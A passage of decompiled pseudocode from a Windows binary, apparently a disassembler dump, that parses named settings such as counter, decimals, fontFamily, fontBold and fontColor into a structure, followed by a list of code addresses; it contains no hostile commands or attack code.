																																																					 *_t1602(_t1125);
																																																					 *_t1640 = 0;
																																																				}
																																																				_t1126 =  *(_t1640 + 4);
																																																				__eflags = _t1126;
																																																				if(_t1126 != 0) {
																																																					E6E7E447C(_t1126);
																																																					_t1691 = _t1691 + 4;
																																																					 *(_t1640 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E7E441B(_t1640);
																																																				_t1691 = _t1691 + 8;
																																																			}
																																																		}
																																																		_v108 = 0;
																																																	}
																																																	__eflags = _t1372;
																																																	if(__eflags == 0) {
																																																		_t1032 = E6E7D82F0(_t1372,  &_v116, _t1575, __eflags, "counter");
																																																		_t1465 =  &_v32;
																																																		_t1033 = E6E7D85E0(_t1465, _t1032);
																																																		_t1641 = _v116;
																																																		_t1373 = _t1033;
																																																		__eflags = _t1641;
																																																		if(_t1641 != 0) {
																																																			asm("lock xadd [esi+0x8], ecx");
																																																			__eflags = (_t1465 | 0xffffffff) == 1;
																																																			if((_t1465 | 0xffffffff) == 1) {
																																																				__eflags = _t1641;
																																																				if(_t1641 != 0) {
																																																					_t1109 =  *_t1641;
																																																					__eflags = _t1109;
																																																					if(_t1109 != 0) {
																																																						 *_t1602(_t1109);
																																																						 *_t1641 = 0;
																																																					}
																																																					_t1110 =  *(_t1641 + 4);
																																																					__eflags = _t1110;
																																																					if(_t1110 != 0) {
																																																						E6E7E447C(_t1110);
																																																						_t1691 = _t1691 + 4;
																																																						 *(_t1641 + 4) = 0;
																																																					}
																																																					_push(0xc);
																																																					E6E7E441B(_t1641);
																																																					_t1691 = _t1691 + 8;
																																																				}
																																																			}
																																																			_v116 = 0;
																																																		}
																																																		__eflags = _t1373;
																																																		if(__eflags == 0) {
																																																			_t1034 = E6E7D82F0(_t1373,  &_v124, _t1575, __eflags, "divide");
																																																			_t1467 =  &_v32;
																																																			_t1035 = E6E7D85E0(_t1467, _t1034);
																																																			_t1642 = _v124;
																																																			_t1374 = _t1035;
																																																			__eflags = _t1642;
																																																			if(_t1642 != 0) {
																																																				asm("lock xadd [esi+0x8], ecx");
																																																				__eflags = (_t1467 | 0xffffffff) == 1;
																																																				if((_t1467 | 0xffffffff) == 1) {
																																																					__eflags = _t1642;
																																																					if(_t1642 != 0) {
																																																						_t1093 =  *_t1642;
																																																						__eflags = _t1093;
																																																						if(_t1093 != 0) {
																																																							 *_t1602(_t1093);
																																																							 *_t1642 = 0;
																																																						}
																																																						_t1094 =  *(_t1642 + 4);
																																																						__eflags = _t1094;
																																																						if(_t1094 != 0) {
																																																							E6E7E447C(_t1094);
																																																							_t1691 = _t1691 + 4;
																																																							 *(_t1642 + 4) = 0;
																																																						}
																																																						_push(0xc);
																																																						E6E7E441B(_t1642);
																																																						_t1691 = _t1691 + 8;
																																																					}
																																																				}
																																																				_v124 = 0;
																																																			}
																																																			__eflags = _t1374;
																																																			if(__eflags == 0) {
																																																				_t1036 = E6E7D82F0(_t1374,  &_v132, _t1575, __eflags, "decimals");
																																																				_t1469 =  &_v32;
																																																				_t1037 = E6E7D85E0(_t1469, _t1036);
																																																				_t1643 = _v132;
																																																				_t1375 = _t1037;
																																																				__eflags = _t1643;
																																																				if(_t1643 != 0) {
																																																					asm("lock xadd [esi+0x8], ecx");
																																																					__eflags = (_t1469 | 0xffffffff) == 1;
																																																					if((_t1469 | 0xffffffff) == 1) {
																																																						__eflags = _t1643;
																																																						if(_t1643 != 0) {
																																																							_t1076 =  *_t1643;
																																																							__eflags = _t1076;
																																																							if(_t1076 != 0) {
																																																								 *_t1602(_t1076);
																																																								 *_t1643 = 0;
																																																							}
																																																							_t1077 =  *(_t1643 + 4);
																																																							__eflags = _t1077;
																																																							if(_t1077 != 0) {
																																																								E6E7E447C(_t1077);
																																																								_t1691 = _t1691 + 4;
																																																								 *(_t1643 + 4) = 0;
																																																							}
																																																							_push(0xc);
																																																							E6E7E441B(_t1643);
																																																							_t1691 = _t1691 + 8;
																																																						}
																																																					}
																																																					_v132 = 0;
																																																				}
																																																				__eflags = _t1375;
																																																				if(__eflags == 0) {
																																																					_t1038 = E6E7D82F0(_t1375,  &_v140, _t1575, __eflags, "characters");
																																																					_t1471 =  &_v32;
																																																					_t1039 = E6E7D85E0(_t1471, _t1038);
																																																					_t1644 = _v140;
																																																					_t1376 = _t1039;
																																																					__eflags = _t1644;
																																																					if(_t1644 != 0) {
																																																						asm("lock xadd [esi+0x8], ecx");
																																																						__eflags = (_t1471 | 0xffffffff) == 1;
																																																						if((_t1471 | 0xffffffff) == 1) {
																																																							__eflags = _t1644;
																																																							if(_t1644 != 0) {
																																																								_t1060 =  *_t1644;
																																																								__eflags = _t1060;
																																																								if(_t1060 != 0) {
																																																									 *_t1602(_t1060);
																																																									 *_t1644 = 0;
																																																								}
																																																								_t1061 =  *(_t1644 + 4);
																																																								__eflags = _t1061;
																																																								if(_t1061 != 0) {
																																																									E6E7E447C(_t1061);
																																																									_t1691 = _t1691 + 4;
																																																									 *(_t1644 + 4) = 0;
																																																								}
																																																								_push(0xc);
																																																								E6E7E441B(_t1644);
																																																								_t1691 = _t1691 + 8;
																																																							}
																																																						}
																																																						_v140 = 0;
																																																					}
																																																					__eflags = _t1376;
																																																					if(_t1376 != 0) {
																																																						_push( &_v68);
																																																						_t1050 = E6E7D8730(_t1376,  &_v144, _t1575, _t1602, _t1644, _t1736);
																																																						_v16 = 0x14;
																																																						_t1052 = E6E7F50D9(_t1050, E6E7D85C0(_t1050));
																																																						_t1691 = _t1691 + 4;
																																																						_t1646 = _v144;
																																																						 *(_v92 + 0x48) = _t1052;
																																																						__eflags = _t1646;
																																																						if(_t1646 != 0) {
																																																							asm("lock xadd [esi+0x8], eax");
																																																							__eflags = (_t1052 | 0xffffffff) == 1;
																																																							if((_t1052 | 0xffffffff) == 1) {
																																																								__eflags = _t1646;
																																																								if(_t1646 != 0) {
																																																									_t1055 =  *_t1646;
																																																									__eflags = _t1055;
																																																									if(_t1055 != 0) {
																																																										 *_t1602(_t1055);
																																																										 *_t1646 = 0;
																																																									}
																																																									_t1056 =  *(_t1646 + 4);
																																																									__eflags = _t1056;
																																																									if(_t1056 != 0) {
																																																										E6E7E447C(_t1056);
																																																										_t1691 = _t1691 + 4;
																																																										 *(_t1646 + 4) = 0;
																																																									}
																																																									_push(0xc);
																																																									E6E7E441B(_t1646);
																																																									_t1691 = _t1691 + 8;
																																																								}
																																																							}
																																																							_v144 = 0;
																																																						}
																																																					}
																																																				} else {
																																																					_push( &_v68);
																																																					_t1066 = E6E7D8730(_t1375,  &_v136, _t1575, _t1602, _t1643, _t1736);
																																																					_v16 = 0x13;
																																																					_t1068 = E6E7F50D9(_t1066, E6E7D85C0(_t1066));
																																																					_t1691 = _t1691 + 4;
																																																					_t1647 = _v136;
																																																					 *(_v92 + 0x4c) = _t1068;
																																																					__eflags = _t1647;
																																																					if(_t1647 != 0) {
																																																						asm("lock xadd [esi+0x8], eax");
																																																						__eflags = (_t1068 | 0xffffffff) == 1;
																																																						if((_t1068 | 0xffffffff) == 1) {
																																																							__eflags = _t1647;
																																																							if(_t1647 != 0) {
																																																								_t1071 =  *_t1647;
																																																								__eflags = _t1071;
																																																								if(_t1071 != 0) {
																																																									 *_t1602(_t1071);
																																																									 *_t1647 = 0;
																																																								}
																																																								_t1072 =  *(_t1647 + 4);
																																																								__eflags = _t1072;
																																																								if(_t1072 != 0) {
																																																									E6E7E447C(_t1072);
																																																									_t1691 = _t1691 + 4;
																																																									 *(_t1647 + 4) = 0;
																																																								}
																																																								_push(0xc);
																																																								E6E7E441B(_t1647);
																																																								_t1691 = _t1691 + 8;
																																																							}
																																																						}
																																																						_v136 = 0;
																																																					}
																																																				}
																																																			} else {
																																																				_push( &_v68);
																																																				_t1082 = E6E7D8730(_t1374,  &_v128, _t1575, _t1602, _t1642, _t1736);
																																																				_v16 = 0x12;
																																																				E6E7F5989(E6E7D85C0(_t1082));
																																																				_t1085 = _v92;
																																																				_t1691 = _t1691 + 4;
																																																				_t1648 = _v128;
																																																				 *((long long*)(_t1085 + 0x50)) = _t1736;
																																																				__eflags = _t1648;
																																																				if(_t1648 != 0) {
																																																					asm("lock xadd [esi+0x8], eax");
																																																					__eflags = (_t1085 | 0xffffffff) == 1;
																																																					if((_t1085 | 0xffffffff) == 1) {
																																																						__eflags = _t1648;
																																																						if(_t1648 != 0) {
																																																							_t1088 =  *_t1648;
																																																							__eflags = _t1088;
																																																							if(_t1088 != 0) {
																																																								 *_t1602(_t1088);
																																																								 *_t1648 = 0;
																																																							}
																																																							_t1089 =  *(_t1648 + 4);
																																																							__eflags = _t1089;
																																																							if(_t1089 != 0) {
																																																								E6E7E447C(_t1089);
																																																								_t1691 = _t1691 + 4;
																																																								 *(_t1648 + 4) = 0;
																																																							}
																																																							_push(0xc);
																																																							E6E7E441B(_t1648);
																																																							_t1691 = _t1691 + 8;
																																																						}
																																																					}
																																																					_v128 = 0;
																																																				}
																																																			}
																																																		} else {
																																																			_push( &_v68);
																																																			_t1099 = E6E7D8730(_t1373,  &_v120, _t1575, _t1602, _t1641, _t1736);
																																																			_v16 = 0x11;
																																																			_t1591 =  *_t1099;
																																																			__eflags = _t1591;
																																																			if(_t1591 == 0) {
																																																				_t1575 = 0;
																																																				__eflags = 0;
																																																			} else {
																																																				_t1575 =  *_t1591;
																																																			}
																																																			_t1488 = _t1575;
																																																			_t1649 = _t1488 + 2;
																																																			do {
																																																				_t1100 =  *_t1488;
																																																				_t1488 = _t1488 + 2;
																																																				__eflags = _t1100;
																																																			} while (_t1100 != 0);
																																																			_push(_t1488 - _t1649 >> 1);
																																																			_t1101 = E6E7DBC80(_t1373, _v92, _t1602, _t1649, _t1736, _t1575);
																																																			_t1650 = _v120;
																																																			__eflags = _t1650;
																																																			if(_t1650 != 0) {
																																																				asm("lock xadd [esi+0x8], eax");
																																																				__eflags = (_t1101 | 0xffffffff) == 1;
																																																				if((_t1101 | 0xffffffff) == 1) {
																																																					__eflags = _t1650;
																																																					if(_t1650 != 0) {
																																																						_t1104 =  *_t1650;
																																																						__eflags = _t1104;
																																																						if(_t1104 != 0) {
																																																							 *_t1602(_t1104);
																																																							 *_t1650 = 0;
																																																						}
																																																						_t1105 =  *(_t1650 + 4);
																																																						__eflags = _t1105;
																																																						if(_t1105 != 0) {
																																																							E6E7E447C(_t1105);
																																																							_t1691 = _t1691 + 4;
																																																							 *(_t1650 + 4) = 0;
																																																						}
																																																						_push(0xc);
																																																						E6E7E441B(_t1650);
																																																						_t1691 = _t1691 + 8;
																																																					}
																																																				}
																																																				_v120 = 0;
																																																			}
																																																		}
																																																	} else {
																																																		_push( &_v68);
																																																		_t1115 = E6E7D8730(_t1372,  &_v112, _t1575, _t1602, _t1640, _t1736);
																																																		_v16 = 0x10;
																																																		_t1592 =  *_t1115;
																																																		__eflags = _t1592;
																																																		if(_t1592 == 0) {
																																																			_t1575 = 0;
																																																			__eflags = 0;
																																																		} else {
																																																			_t1575 =  *_t1592;
																																																		}
																																																		_t1495 = _t1575;
																																																		_t1651 = _t1495 + 2;
																																																		do {
																																																			_t1116 =  *_t1495;
																																																			_t1495 = _t1495 + 2;
																																																			__eflags = _t1116;
																																																		} while (_t1116 != 0);
																																																		_push(_t1495 - _t1651 >> 1);
																																																		_t1117 = E6E7DBC80(_t1372, _v92 + 0x30, _t1602, _t1651, _t1736, _t1575);
																																																		_t1652 = _v112;
																																																		__eflags = _t1652;
																																																		if(_t1652 != 0) {
																																																			asm("lock xadd [esi+0x8], eax");
																																																			__eflags = (_t1117 | 0xffffffff) == 1;
																																																			if((_t1117 | 0xffffffff) == 1) {
																																																				__eflags = _t1652;
																																																				if(_t1652 != 0) {
																																																					_t1120 =  *_t1652;
																																																					__eflags = _t1120;
																																																					if(_t1120 != 0) {
																																																						 *_t1602(_t1120);
																																																						 *_t1652 = 0;
																																																					}
																																																					_t1121 =  *(_t1652 + 4);
																																																					__eflags = _t1121;
																																																					if(_t1121 != 0) {
																																																						E6E7E447C(_t1121);
																																																						_t1691 = _t1691 + 4;
																																																						 *(_t1652 + 4) = 0;
																																																					}
																																																					_push(0xc);
																																																					E6E7E441B(_t1652);
																																																					_t1691 = _t1691 + 8;
																																																				}
																																																			}
																																																			_v112 = 0;
																																																		}
																																																	}
																																																} else {
																																																	_push( &_v68);
																																																	_t1131 = E6E7D8730(_t1371,  &_v104, _t1575, _t1602, _t1639, _t1736);
																																																	_v16 = 0xf;
																																																	_t1593 =  *_t1131;
																																																	__eflags = _t1593;
																																																	if(_t1593 == 0) {
																																																		_t1575 = 0;
																																																		__eflags = 0;
																																																	} else {
																																																		_t1575 =  *_t1593;
																																																	}
																																																	_t1503 = _t1575;
																																																	_t1653 = _t1503 + 2;
																																																	do {
																																																		_t1132 =  *_t1503;
																																																		_t1503 = _t1503 + 2;
																																																		__eflags = _t1132;
																																																	} while (_t1132 != 0);
																																																	_push(_t1503 - _t1653 >> 1);
																																																	_t1133 = E6E7DBC80(_t1371, _v92 + 0x18, _t1602, _t1653, _t1736, _t1575);
																																																	_t1654 = _v104;
																																																	__eflags = _t1654;
																																																	if(_t1654 != 0) {
																																																		asm("lock xadd [esi+0x8], eax");
																																																		__eflags = (_t1133 | 0xffffffff) == 1;
																																																		if((_t1133 | 0xffffffff) == 1) {
																																																			__eflags = _t1654;
																																																			if(_t1654 != 0) {
																																																				_t1136 =  *_t1654;
																																																				__eflags = _t1136;
																																																				if(_t1136 != 0) {
																																																					 *_t1602(_t1136);
																																																					 *_t1654 = 0;
																																																				}
																																																				_t1137 =  *(_t1654 + 4);
																																																				__eflags = _t1137;
																																																				if(_t1137 != 0) {
																																																					E6E7E447C(_t1137);
																																																					_t1691 = _t1691 + 4;
																																																					 *(_t1654 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E7E441B(_t1654);
																																																				_t1691 = _t1691 + 8;
																																																			}
																																																		}
																																																		_v104 = 0;
																																																	}
																																																}
																																																_t1040 =  &_v68;
																																																__imp__#9(_t1040);
																																																_t1645 = _v32;
																																																__eflags = _t1645;
																																																if(_t1645 != 0) {
																																																	asm("lock xadd [esi+0x8], eax");
																																																	__eflags = (_t1040 | 0xffffffff) == 1;
																																																	if((_t1040 | 0xffffffff) == 1) {
																																																		_t1044 =  *_t1645;
																																																		__eflags = _t1044;
																																																		if(_t1044 != 0) {
																																																			 *_t1602(_t1044);
																																																			 *_t1645 = 0;
																																																		}
																																																		_t1045 =  *(_t1645 + 4);
																																																		__eflags = _t1045;
																																																		if(_t1045 != 0) {
																																																			E6E7E447C(_t1045);
																																																			_t1691 = _t1691 + 4;
																																																			 *(_t1645 + 4) = 0;
																																																		}
																																																		_push(0xc);
																																																		E6E7E441B(_t1645);
																																																		_t1691 = _t1691 + 8;
																																																	}
																																																}
																																																_v16 = 4;
																																																_t1360 = __imp__#6;
																																																 *_t1360(_v44);
																																																_t1016 = _v36;
																																																_t1392 = _v96 + 1;
																																																_v96 = _t1392;
																																																__eflags = _t1392 - _v48;
																																																if(_t1392 < _v48) {
																																																	continue;
																																																} else {
																																																	goto L411;
																																																}
																																															}
																																														}
																																													}
																																												}
																																											}
																																										}
																																										goto L600;
																																									}
																																									goto L420;
																																								}
																																							}
																																						}
																																					}
																																				}
																																			} else {
																																				_t1151 = _t1575;
																																				goto L245;
																																			}
																																		}
																																	}
																																} else {
																																	_v12 = 0xe;
																																	_t1216 = E6E7D82F0(_t1360,  &_v188,  &_v168, __eflags, "fontFamily");
																																	_t1526 =  &_v28;
																																	_t1217 = E6E7D85E0(_t1526, _t1216);
																																	_t1656 = _v188;
																																	_v169 = _t1217;
																																	__eflags = _t1656;
																																	if(_t1656 != 0) {
																																		asm("lock xadd [esi+0x8], ecx");
																																		__eflags = (_t1526 | 0xffffffff) == 1;
																																		if((_t1526 | 0xffffffff) == 1) {
																																			__eflags = _t1656;
																																			if(_t1656 != 0) {
																																				_t1316 =  *_t1656;
																																				__eflags = _t1316;
																																				if(_t1316 != 0) {
																																					 *_t1360(_t1316);
																																					 *_t1656 = 0;
																																				}
																																				_t1317 =  *(_t1656 + 4);
																																				__eflags = _t1317;
																																				if(_t1317 != 0) {
																																					E6E7E447C(_t1317);
																																					_t1689 = _t1689 + 4;
																																					 *(_t1656 + 4) = 0;
																																				}
																																				_push(0xc);
																																				E6E7E441B(_t1656);
																																				_t1217 = _v169;
																																				_t1689 = _t1689 + 8;
																																			}
																																		}
																																		_v188 = 0;
																																	}
																																	__eflags = _t1217;
																																	if(__eflags == 0) {
																																		_t1218 = E6E7D82F0(_t1360,  &_v196, _t1574, __eflags, "fontBold");
																																		_t1528 =  &_v28;
																																		_t1219 = E6E7D85E0(_t1528, _t1218);
																																		_t1657 = _v196;
																																		_v169 = _t1219;
																																		__eflags = _t1657;
																																		if(_t1657 != 0) {
																																			asm("lock xadd [esi+0x8], ecx");
																																			__eflags = (_t1528 | 0xffffffff) == 1;
																																			if((_t1528 | 0xffffffff) == 1) {
																																				__eflags = _t1657;
																																				if(_t1657 != 0) {
																																					_t1300 =  *_t1657;
																																					__eflags = _t1300;
																																					if(_t1300 != 0) {
																																						 *_t1360(_t1300);
																																						 *_t1657 = 0;
																																					}
																																					_t1301 =  *(_t1657 + 4);
																																					__eflags = _t1301;
																																					if(_t1301 != 0) {
																																						E6E7E447C(_t1301);
																																						_t1689 = _t1689 + 4;
																																						 *(_t1657 + 4) = 0;
																																					}
																																					_push(0xc);
																																					E6E7E441B(_t1657);
																																					_t1219 = _v169;
																																					_t1689 = _t1689 + 8;
																																				}
																																			}
																																			_v196 = 0;
																																		}
																																		__eflags = _t1219;
																																		if(__eflags == 0) {
																																			_t1220 = E6E7D82F0(_t1360,  &_v204, _t1574, __eflags, "fontItalic");
																																			_t1530 =  &_v28;
																																			_t1221 = E6E7D85E0(_t1530, _t1220);
																																			_t1658 = _v204;
																																			_v169 = _t1221;
																																			__eflags = _t1658;
																																			if(_t1658 != 0) {
																																				asm("lock xadd [esi+0x8], ecx");
																																				__eflags = (_t1530 | 0xffffffff) == 1;
																																				if((_t1530 | 0xffffffff) == 1) {
																																					__eflags = _t1658;
																																					if(_t1658 != 0) {
																																						_t1282 =  *_t1658;
																																						__eflags = _t1282;
																																						if(_t1282 != 0) {
																																							 *_t1360(_t1282);
																																							 *_t1658 = 0;
																																						}
																																						_t1283 =  *(_t1658 + 4);
																																						__eflags = _t1283;
																																						if(_t1283 != 0) {
																																							E6E7E447C(_t1283);
																																							_t1689 = _t1689 + 4;
																																							 *(_t1658 + 4) = 0;
																																						}
																																						_push(0xc);
																																						E6E7E441B(_t1658);
																																						_t1221 = _v169;
																																						_t1689 = _t1689 + 8;
																																					}
																																				}
																																				_v204 = 0;
																																			}
																																			__eflags = _t1221;
																																			if(__eflags == 0) {
																																				_t1222 = E6E7D82F0(_t1360,  &_v212, _t1574, __eflags, "fontColor");
																																				_t1532 =  &_v28;
																																				_t1223 = E6E7D85E0(_t1532, _t1222);
																																				_t1659 = _v212;
																																				_v169 = _t1223;
																																				__eflags = _t1659;
																																				if(_t1659 != 0) {
																																					asm("lock xadd [esi+0x8], ecx");
																																					__eflags = (_t1532 | 0xffffffff) == 1;
																																					if((_t1532 | 0xffffffff) == 1) {
																																						__eflags = _t1659;
																																						if(_t1659 != 0) {
																																							_t1264 =  *_t1659;
																																							__eflags = _t1264;
																																							if(_t1264 != 0) {
																																								 *_t1360(_t1264);
																																								 *_t1659 = 0;
																																							}
																																							_t1265 =  *(_t1659 + 4);
																																							__eflags = _t1265;
																																							if(_t1265 != 0) {
																																								E6E7E447C(_t1265);
																																								_t1689 = _t1689 + 4;
																																								 *(_t1659 + 4) = 0;
																																							}
																																							_push(0xc);
																																							E6E7E441B(_t1659);
																																							_t1223 = _v169;
																																							_t1689 = _t1689 + 8;
																																						}
																																					}
																																					_v212 = 0;
																																				}
																																				__eflags = _t1223;
																																				if(__eflags == 0) {
																																					_t1224 = E6E7D82F0(_t1360,  &_v220, _t1574, __eflags, "fontSize");
																																					_t1534 =  &_v28;
																																					_t1225 = E6E7D85E0(_t1534, _t1224);
																																					_t1660 = _v220;
																																					_v169 = _t1225;
																																					__eflags = _t1660;
																																					if(_t1660 != 0) {
																																						asm("lock xadd [esi+0x8], ecx");
																																						__eflags = (_t1534 | 0xffffffff) == 1;
																																						if((_t1534 | 0xffffffff) == 1) {
																																							__eflags = _t1660;
																																							if(_t1660 != 0) {
																																								_t1247 =  *_t1660;
																																								__eflags = _t1247;
																																								if(_t1247 != 0) {
																																									 *_t1360(_t1247);
																																									 *_t1660 = 0;
																																								}
																																								_t1248 =  *(_t1660 + 4);
																																								__eflags = _t1248;
																																								if(_t1248 != 0) {
																																									E6E7E447C(_t1248);
																																									_t1689 = _t1689 + 4;
																																									 *(_t1660 + 4) = 0;
																																								}
																																								_push(0xc);
																																								E6E7E441B(_t1660);
																																								_t1225 = _v169;
																																								_t1689 = _t1689 + 8;
																																							}
																																						}
																																						_v220 = 0;
																																					}
																																					__eflags = _t1225;
																																					if(_t1225 != 0) {
																																						_push( &_v64);
																																						_t1236 = E6E7D8730(_t1360,  &_v224, _t1574, _t1602, _t1660, _t1736);
																																						_v12 = 0x10;
																																						E6E7F5989(E6E7D85C0(_t1236));
																																						_t1239 = _v180;
																																						_t1689 = _t1689 + 4;
																																						_t1661 = _v224;
																																						 *((long long*)(_t1239 + 0x20)) = _t1736;
																																						__eflags = _t1661;
																																						if(_t1661 != 0) {
																																							asm("lock xadd [esi+0x8], eax");
																																							__eflags = (_t1239 | 0xffffffff) == 1;
																																							if((_t1239 | 0xffffffff) == 1) {
																																								__eflags = _t1661;
																																								if(_t1661 != 0) {
																																									_t1242 =  *_t1661;
																																									__eflags = _t1242;
																																									if(_t1242 != 0) {
																																										 *_t1360(_t1242);
																																										 *_t1661 = 0;
																																									}
																																									_t1243 =  *(_t1661 + 4);
																																									__eflags = _t1243;
																																									if(_t1243 != 0) {
																																										E6E7E447C(_t1243);
																																										_t1689 = _t1689 + 4;
																																										 *(_t1661 + 4) = 0;
																																									}
																																									_push(0xc);
																																									E6E7E441B(_t1661);
																																									_t1689 = _t1689 + 8;
																																								}
																																							}
																																							_v224 = 0;
																																						}
																																					}
																																				} else {
																																					_push( &_v64);
																																					_t1541 =  *(E6E7D8730(_t1360,  &_v216, _t1574, _t1602, _t1659, _t1736));
																																					__eflags = _t1541;
																																					if(_t1541 == 0) {
																																						_t1542 = 0;
																																						__eflags = 0;
																																					} else {
																																						_t1542 =  *_t1541;
																																					}
																																					_t1256 = E6E7D8180(_t1542, L"%lX", _v180 + 0x1c);
																																					_t1662 = _v216;
																																					_t1689 = _t1689 + 0xc;
																																					__eflags = _t1662;
																																					if(_t1662 != 0) {
																																						asm("lock xadd [esi+0x8], eax");
																																						__eflags = (_t1256 | 0xffffffff) == 1;
																																						if((_t1256 | 0xffffffff) == 1) {
																																							__eflags = _t1662;
																																							if(_t1662 != 0) {
																																								_t1259 =  *_t1662;
																																								__eflags = _t1259;
																																								if(_t1259 != 0) {
																																									 *_t1360(_t1259);
																																									 *_t1662 = 0;
																																								}
																																								_t1260 =  *(_t1662 + 4);
																																								__eflags = _t1260;
																																								if(_t1260 != 0) {
																																									E6E7E447C(_t1260);
																																									_t1689 = _t1689 + 4;
																																									 *(_t1662 + 4) = 0;
																																								}
																																								_push(0xc);
																																								E6E7E441B(_t1662);
																																								_t1689 = _t1689 + 8;
																																							}
																																						}
																																						_v216 = 0;
																																					}
																																				}
																																			} else {
																																				_push( &_v64);
																																				_t1271 =  *(E6E7D8730(_t1360,  &_v208, _t1574, _t1602, _t1658, _t1736));
																																				__eflags = _t1271;
																																				if(_t1271 == 0) {
																																					_t1272 = 0;
																																					__eflags = 0;
																																				} else {
																																					_t1272 =  *_t1271;
																																				}
																																				_t1273 = E6E7F5103(_t1360, _t1602, _t1658, _t1272, L"true");
																																				_t1689 = _t1689 + 8;
																																				_t1663 = _v208;
																																				__eflags = _t1273;
																																				 *((char*)(_v180 + 0x19)) = _t1273 & 0xffffff00 | _t1273 == 0x00000000;
																																				__eflags = _t1663;
																																				if(_t1663 != 0) {
																																					asm("lock xadd [esi+0x8], eax");
																																					__eflags = 0xfffffffffffffffe;
																																					if(0xfffffffffffffffe == 0) {
																																						__eflags = _t1663;
																																						if(_t1663 != 0) {
																																							_t1277 =  *_t1663;
																																							__eflags = _t1277;
																																							if(_t1277 != 0) {
																																								 *_t1360(_t1277);
																																								 *_t1663 = 0;
																																							}
																																							_t1278 =  *(_t1663 + 4);
																																							__eflags = _t1278;
																																							if(_t1278 != 0) {
																																								E6E7E447C(_t1278);
																																								_t1689 = _t1689 + 4;
																																								 *(_t1663 + 4) = 0;
																																							}
																																							_push(0xc);
																																							E6E7E441B(_t1663);
																																							_t1689 = _t1689 + 8;
																																						}
																																					}
																																					_v208 = 0;
																																				}
																																			}
																																		} else {
																																			_push( &_v64);
																																			_t1289 =  *(E6E7D8730(_t1360,  &_v200, _t1574, _t1602, _t1657, _t1736));
																																			__eflags = _t1289;
																																			if(_t1289 == 0) {
																																				_t1290 = 0;
																																				__eflags = 0;
																																			} else {
																																				_t1290 =  *_t1289;
																																			}
																																			_t1291 = E6E7F5103(_t1360, _t1602, _t1657, _t1290, L"true");
																																			_t1689 = _t1689 + 8;
																																			_t1664 = _v200;
																																			__eflags = _t1291;
																																			 *((char*)(_v180 + 0x18)) = _t1291 & 0xffffff00 | _t1291 == 0x00000000;
																																			__eflags = _t1664;
																																			if(_t1664 != 0) {
																																				asm("lock xadd [esi+0x8], eax");
																																				__eflags = 0xfffffffffffffffe;
																																				if(0xfffffffffffffffe == 0) {
																																					__eflags = _t1664;
																																					if(_t1664 != 0) {
																																						_t1295 =  *_t1664;
																																						__eflags = _t1295;
																																						if(_t1295 != 0) {
																																							 *_t1360(_t1295);
																																							 *_t1664 = 0;
																																						}
																																						_t1296 =  *(_t1664 + 4);
																																						__eflags = _t1296;
																																						if(_t1296 != 0) {
																																							E6E7E447C(_t1296);
																																							_t1689 = _t1689 + 4;
																																							 *(_t1664 + 4) = 0;
																																						}
																																						_push(0xc);
																																						E6E7E441B(_t1664);
																																						_t1689 = _t1689 + 8;
																																					}
																																				}
																																				_v200 = 0;
																																			}
																																		}
																																	} else {
																																		_push( &_v64);
																																		_t1306 = E6E7D8730(_t1360,  &_v192, _t1574, _t1602, _t1656, _t1736);
																																		_v12 = 0xf;
																																		_t1600 =  *_t1306;
																																		__eflags = _t1600;
																																		if(_t1600 == 0) {
																																			_t1574 = 0;
																																			__eflags = 0;
																																		} else {
																																			_t1574 =  *_t1600;
																																		}
																																		_t1554 = _t1574;
																																		_t147 = _t1554 + 2; // 0x2
																																		_t1665 = _t147;
																																		goto L82;
																																		L82:
																																		_t1307 =  *_t1554;
																																		_t1554 = _t1554 + 2;
																																		__eflags = _t1307;
																																		if(_t1307 != 0) {
																																			goto L82;
																																		} else {
																																			_push(_t1554 - _t1665 >> 1);
																																			_t1308 = E6E7DBC80(_t1360, _v180, _t1602, _t1665, _t1736, _t1574);
																																			_t1666 = _v192;
																																			__eflags = _t1666;
																																			if(_t1666 != 0) {
																																				asm("lock xadd [esi+0x8], eax");
																																				__eflags = (_t1308 | 0xffffffff) == 1;
																																				if((_t1308 | 0xffffffff) == 1) {
																																					__eflags = _t1666;
																																					if(_t1666 != 0) {
																																						_t1311 =  *_t1666;
																																						__eflags = _t1311;
																																						if(_t1311 != 0) {
																																							 *_t1360(_t1311);
																																							 *_t1666 = 0;
																																						}
																																						_t1312 =  *(_t1666 + 4);
																																						__eflags = _t1312;
																																						if(_t1312 != 0) {
																																							E6E7E447C(_t1312);
																																							_t1689 = _t1689 + 4;
																																							 *(_t1666 + 4) = 0;
																																						}
																																						_push(0xc);
																																						E6E7E441B(_t1666);
																																						_t1689 = _t1689 + 8;
																																					}
																																				}
																																				_v192 = 0;
																																			}
																																		}
																																	}
																																	_t1226 =  &_v64;
																																	__imp__#9(_t1226);
																																	_t1616 = _v28;
																																	__eflags = _t1616;
																																	if(_t1616 != 0) {
																																		asm("lock xadd [esi+0x8], eax");
																																		__eflags = (_t1226 | 0xffffffff) == 1;
																																		if((_t1226 | 0xffffffff) == 1) {
																																			_t1230 =  *_t1616;
																																			__eflags = _t1230;
																																			if(_t1230 != 0) {
																																				 *_t1360(_t1230);
																																				 *_t1616 = 0;
																																			}
																																			_t1231 =  *(_t1616 + 4);
																																			__eflags = _t1231;
																																			if(_t1231 != 0) {
																																				E6E7E447C(_t1231);
																																				_t1689 = _t1689 + 4;
																																				 *(_t1616 + 4) = 0;
																																			}
																																			_push(0xc);
																																			E6E7E441B(_t1616);
																																			_t1689 = _t1689 + 8;
																																		}
																																	}
																																	_v12 = 4;
																																	 *_t1360(_v36);
																																	_t1387 = _v184 + 1;
																																	_v184 = _t1387;
																																	__eflags = _t1387 - _v48;
																																	if(_t1387 >= _v48) {
																																		goto L188;
																																	} else {
																																		_t1162 = _v40;
																																		continue;
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																											goto L600;
																										}
																										goto L234;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t795 = _t1574;
																					goto L50;
																				}
																			}
																		}
																	} else {
																		_t789 = _t1573;
																		goto L43;
																	}
																}
															}
														} else {
															goto L16;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L600;
						}
						goto L35;
					}
				}
				L600:
			}

0x6e7d96b0
0x6e7d96b0
0x6e7d96b0
0x6e7d96b1
0x6e7d96b3
0x6e7d96b5
0x6e7d96c0
0x6e7d96c1
0x6e7d96c4
0x6e7d96c9
0x6e7d96cb
0x6e7d96ce
0x6e7d96cf
0x6e7d96d0
0x6e7d96d1
0x6e7d96d5
0x6e7d96db
0x6e7d96dd
0x6e7d96e4
0x6e7d96eb
